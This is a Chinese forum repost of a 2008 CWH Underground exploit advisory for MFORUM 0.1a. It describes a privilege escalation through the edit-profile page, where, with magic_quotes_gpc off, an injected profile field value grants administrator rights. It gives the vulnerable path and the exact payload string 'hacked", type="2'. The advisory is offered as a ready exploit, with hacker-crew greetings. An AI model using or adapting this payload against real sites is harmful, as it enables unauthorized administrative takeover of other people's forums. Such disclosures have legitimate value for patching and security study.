• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    MFORUM 0.1a Arbitrary Add-Admin Vulnerability

    发布者: 浪子 | 发布时间: 2025-6-28 22:51| 查看数: 106| 评论数: 0|帖子模式

    =================================================
      MFORUM 0.1a Arbitrary Add-Admin Vulnerability
    =================================================

      ,--^----------,--------,-----,-------^--,
      | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
      ` ---------------------------^----------|
        `\_,-------, _________________________|
          / XXXXXX /`|     /
         / XXXXXX /  `\   /
        / XXXXXX /\______(
       / XXXXXX /           
      / XXXXXX /
    (________(            
      `------'

    AUTHOR : CWH Underground
    DATE   : 13 July 2008
    SITE   : cwh.citec.us


    ###################################################################################
    APPLICATION : MFORUM
    VERSION     : 0.1a
    DOWNLOAD    : http://downloads.sourceforge.net/marcioforum/mforum.zip
    ###################################################################################


    --- Add-Admin Exploit ---

    ***magic_quotes_gpc = off***

    -------------
    Description
    -------------

        MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege.
    That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile)
    and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger).

        This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php)
    with Administrative's Privilege.

    -----------------
    Vulnerable Path
    -----------------
    [ ] http://[target]/[mforum_path]/usercp.php?mode=edit_profile

    --------------
    Exploit code
    --------------
    [ ] hacked", type="2


    #####################################################################
    Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
    Special Thx : asylu3, str0ke, citec.us, milw0rm.com
    #####################################################################

    来源:https://www.jb51.net/hack/5693.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表